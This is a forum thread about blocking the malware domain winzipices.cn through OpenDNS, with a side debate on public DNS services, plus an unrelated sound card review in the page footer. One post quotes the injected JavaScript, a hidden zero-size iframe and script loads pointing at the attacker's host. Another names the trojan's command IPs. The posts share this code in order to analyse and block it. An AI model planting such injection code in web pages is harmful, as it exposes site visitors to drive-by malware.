Use OpenDNS to block winzipices.cn


Recommended Posts

You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer.

Thats the simpliest way

If you have a router, change the DNS servers of your router.

Its really easy..

http://www.opendns.com/start

The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It's probably be slower than your ISP (It's about 20 times slower than my ISP's DNS server)

I just use dnsmasq (on my WRT54GL) myself.

Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people dont accidently go here) - DONT GO THERE, EVEN THOUGH ITS A JS FILE

The stuff in that JS file (2.js) is this:

document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this

if (navigator.systemLanguage=='zh-cn')

{

}

else{

document.write("http://winzipices.cn/5.js");

}

document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and i have added it to the Adware category. Thats why.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Ahh, this took me a while to figure out. Ok, this makes sense

You are using your WRT54G basically as a DHCP server which uses ad-hoc, the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem. Therefore, if you are able to change the DNS server address of your modem, that would be fine.

But if you dont feel comfortable doing it.. dont.

I dont think it would mess up your setup.

I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

That works too.

I (Personally) just blocked all access to any .cn site.

I cant read that language.. so I have no use for those kinds of sites.

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have realplayer installed for it to download and execute automatically. Tested the actual malware- it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158 , in addition to winzipices.cn

A good news for AV users is that the majority of them have already added this to their database- except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

Edited by [deXter]

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to find the links to the actual malware. Seems one needs to have realplayer installed for it to run/execute automatically.

Interesting..

I havent personally tested it, as i dont want to get the malware, lol.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

Difference in page / site load time due to its very large DNS cache

More secure.. you can block adware category, so no more adware sites will ever load.. a malware category is coming soon btw.

Block porn sites too.

Block suspicious responses

Typo corrections

Network shortcuts

OpenDNS keeps it free cause they get revenue from the ads they have from Overture running on the guide / search pages.

Also, they do have paid features, for business who need extra features, but OpenDNS cant provide those for free. and i mean the really big businesses.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

network_map.gif

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

cache.gif

my ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

Node_locations.png

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Edited by [deXter]
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Nope. That lack of surround sound capability (analog) won't fly with me. Sure, I use headphones most of the time, but still.
    • Creative Sound Blaster AE-X PCIe review: your headphones will love it by Steven Parker If you have been reading Neowin for any length of time, you may remember that I reviewed the Sound Blaster Audigy FX Pro back in April. I found it to be an excellent budget sound card, even though it lacked support for formats such as DTS over the included SPDIF port. Anyway, Creative reached out to me again asking if I was interested in reviewing the Sound Blaster AE-X. It is a card mainly targeted at headphone wearers, which I'll get into a bit later. Before we get underway, here is a disclaimer: Creative Labs provided a free sample without any review pre-approval. Here are the full specs of it: Creative Sound Blaster AE-X Dimensions: 179 x 126 x 18 mm Weight: 263g / 9.28 oz Platform: PCI-e DAC: ESS ES9039Q2M Connectivity Options Side: Rear: 1 x HD Audio Front Panel Connector, 1 x ⅛“ Headphone port, 1 x RCA Line-out (Left) port, 1 x RCA Line-out (Right) port, 1 x Coaxial SPDIF-out port, 1 x ⅛“ Mic in/Line-in port, 1 x TOSLINK SPDIF-in port Surround: No DNR / SNR: THD+N: 0.0001% Dynamic Range 130 dB Recording Resolution: PCM up to 32-bit / 192kHz (Stereo) Direct Mode: Line Out (Stereo): PCM up to 32-bit  384 kHz Coaxial SPDIF Out: PCM up to 24-bit 192.0 kHz Headphone Amp: PCM up to 32-bit / 384kHz (Stereo) Native DSD: DSD64, DSD128, DSD256 Output Impedance: 1Ω, Supported Headphone Impedance: 8–600Ω, IEM: 0.5Vrms, Low: 1.5Vrms, Mid: 3Vrms, High: 6Vrms, Maximum output power: 350mW @ 32Ω (High), Maximum output voltage: 6Vrms (High) Front Panel Headphone Amp: PCM up to 32-bit / 192kHz (Stereo) Native DSD: DSD64, DSD128 Output Impedance: 10Ω, Supported Headphone Impedance: 32–300Ω, Maximum output power: 40mW @ 32Ω, Maximum output voltage: 1.9Vrms ASIO: ASIO 2.3 Total Harmonic Distortion: THD+N: 0.0006% Dynamic Range: 114 dB Scout Mode: Yes EMI shielding: No (but it passed all the FCC emission tests) Operating temperature: 0–45°C Input Power: 12V⎓0.5A Warranty: 1 Year (MSRP) Price: $179.99 / £169.99 The Sound Blaster AE-X was announced at the end of May, and it becomes clear that it is mainly for headphone wearers. I should also note that the card does not support DDL/DTS encoding technology, but it is said to support decoding through the coaxial SPDIF port. I was able to test this working with the classic Windows Sound properties, but I could not get a DTS (decode) signal through my Logitech Z906, it defaulted to 3D sound whenever I played DTS content through Plex or Emby. In addition, this card only supports two channels (stereo) over the speakers. The surround support is limited to the Headphone Amp, so before I get underway, what we have here is a card mostly intended for headphone use, especially with its SPDIF In (Toslink) port where you could connect another device like a console. So what about the highlights of this card? The AE-X is powered by the ESS SABRE DAC (ES9039Q2M), which is capable of a 130 dB dynamic range. In addition, it supports 32-bit/384 kHz playback for deeper detail and clarity. The headphone amplifier delivers up to 350 mW @ 32Ω, which admittedly far surpasses standard onboard audio, offering support for studio-grade headphones. DSD256 and ASIO 2.3 are also supported. What doesn't it have? No support for What-U-Hear, Super X-Fi, or the SmartComms Kit No EMI shielding, but it passed all the FCC emission tests (from the FAQ) I also want to make it clear that I am no audiophile. For me, it's purely subjective and it should just "work" out of the box. First impressions As I said in the introduction, I was a bit sad to see that the AE-X only supports stereo output, meaning it would not be on par with my ALC1220 over my speakers, as I mentioned it seems like this card is marketed toward headphone users. Since I am not an avid gamer that would rule me out as a potential customer, but I can still test its capabilities! The card arrived in a nice-looking box, as shown above. It's quite a bit larger than the Audify FX Pro that I reviewed back in April, and at first I thought the covering meant that it was EMI shielded, but it isn't as mentioned above in the highlights section. What's in the box: 1 x Sound Blaster AE-X PCIe card 1 x 3.5 mm CTIA TRRS to Dual TRS Headset Splitter Cable 1 x Quick Start Guide Aside from the Quick Start Guide, which someone at my age (I guess) needs a magnifying glass to read thanks to the tiny fonts, Creative Labs also has the manual online, which first requires you to prove that you're human in order to access it (so I can't direct link it). Anyway, the box is mostly made up of cardboard, and the only plastic in it is the anti-static bag for the card itself. Design Top Bottom The card itself looks pretty cool and actually wouldn't look out of place in an all-white build. There's only one connector, and for some reason it is awkwardly placed on the side (front-facing) that is for the front panel audio connector, which will let you use the headphones through the front PC audio jack. Since the front panel Headphone Amp has fewer capabilities than the rear headphone port, I decided not to use it. Rear of card PCI-e interface The rear of the card is completely open and is normally where you would find the front panel connector. The PCIe interface side is completely covered, which initially made me think it was EMI shielded. I/O panel Side (front-facing) with Front panel connector On the outer rear bracket side we have the TOSLINK SPDIF in, Coaxial SPDIF out, RCA line out (Right), RCA line out (Left), Headphone out, and Mic/Line in ports. On the front facing portion of the card itself is the F-panel connector. Usage Test System Our test system consists of the following: AMD Ryzen 9 9950X3D Gigabyte X870E AORUS MASTER (BIOS F12) Corsair RM1000x (2024) Thermal Grizzly Kyronaut (33x33x0,2mm) 2x 32GB Kingston Fury Beast RGB DDR5 6000MT/s CL36-38-38-80 T-Force Z540 2TB (PCIe Gen5) NVIDIA GeForce RTX 5090 Founders Edition (NVIDIA) Creative Sound Blaster AE-X Windows 11 25H2 Pro I installed the card into the Gigabyte X870E AORUS MASTER which includes the RealTek ALC1220 onboard audio. For our subjective listening tests, I used the Coaxial SPDIF port to my Logitech Z906 speakers. For headphone tests I used the OneOdio Studio Max 2 Wireless DJ Headphones that I reviewed last month. After installing the audio driver, I installed Creative Nexus, which is a relatively new app designed for the latest Sound Blaster cards. Then I discovered the AE-X needed both a driver update from 1.00.15.0001 to 1.01.09.000 and a firmware update from 1.00.06.0000 to 1.00.06.0002, then I was set to go. It should be noted that the card did not work without the driver (not Plug and Play). As you can see above, you can manage the firmware, driver, and inputs via Advanced Settings on the Device tab. By default Nexus enabled "Direct Mode". Upon clicking on Acoustic Engine, the Equalizer can be enabled and set to four different presets, which are: Gaming Music Movies Footsteps Enhancer There's also a dedicated Scout Mode for gamers. I mainly used Tidal and Spotify in the past week to listen to some of my Liked Songs (which now total over 700) in Shuffle mode; there were no pops or interference that I could hear. I also found a 5.1 Surround Music playlist on Tidal that sounded really great over Studio Max 2 headphones. When I reviewed the Audigy FX Pro, I went out and purchased a Logitech Z906 set second-hand for €100 specifically to use with the card, but in this instance all I could get on the AE-X was the 3D output of surround sound through Coaxial SPDIF and although it still sounded great, it isn't quite as good as DTS Interactive via my onboard Realtek ALC1220. Conclusion So what have I learned? The AE-X lacks multi-channel support for 5.1/7.1 setups and drops support for modern surround technologies like Dolby or DTS, functioning strictly as a stereo output device. So to really benefit, you will need Studio-grade headphones to "hear" the benefits of this card. With that being said, I can imagine it will appeal to gamers who are switching between console and PC. By utilizing the SPDIF in port, you could just plug your headphones into the AE-X (front or rear port) and then switch between PC and Console without having to move the headphones to a different port. As I said in the Sound Blaster Audigy review, the EQ in the Creative Nexus app offers safe presets, which allows a user to further tweak the lows, mids, and highs for a personal listening experience. Of course it all depends on the headphones you hook up to it. Speaking of headphones, I kind of wish I had higher-quality Studio-grade headphones to really test this card with; I'm not usually wearing headphones in my day to day duties. The only time I will wear them is if I want to listen to music very late at night and I don't want to disturb my neighbors, so my rating (verdict) is based on this fact. Someone with a PC/Console setup and wears headphone religiously to game, and consume media will benefit much more than I from the high-quality Headphone Amps that are included in the AE-X. Once again, I do feel like Creative could have gone the extra mile to support the S/PDIF port a bit more. Why include it if you're not supporting the main popular digital formats? It seems like the decision was more of a legacy-based one, offering uncompressed 2-channel PCM audio, for users with high-fidelity audio systems and external DACs. Maybe I will be lucky enough to review a card that truly includes all these features in the future. I am sure readers with far more knowledge on audio systems than me will correct me in the comments below. I'll just say I am happy to learn what I don't know! Where to buy The Sound Blaster AE-X is available to purchase now in preorder for $179.99 on the U.S. Creative website, or for £169.99 on the Creative UK website and will start shipping to customers from June 25.
    • $80 or 90%, anything else would be financial suicide one way or another.
    • Or... just use Bitwarden. Free, and has on-prem option as well. Works both on desktop and mobile, wherever you are. The age of local password files is over.
    • Thanks
  • Recent Achievements

    • Week One Done
      Supreme Spray LV earned a badge
      Week One Done
    • One Month Later
      Genuinetonerink- Dubai earned a badge
      One Month Later
    • Week One Done
      Genuinetonerink- Dubai earned a badge
      Week One Done
    • One Year In
      hhgygy earned a badge
      One Year In
    • Week One Done
      AMV earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      513
    2. 2
      +Edouard
      164
    3. 3
      PsYcHoKiLLa
      88
    4. 4
      Steven P.
      74
    5. 5
      Michael Scrip
      73
  • Tell a friend

    Love Neowin? Tell a friend!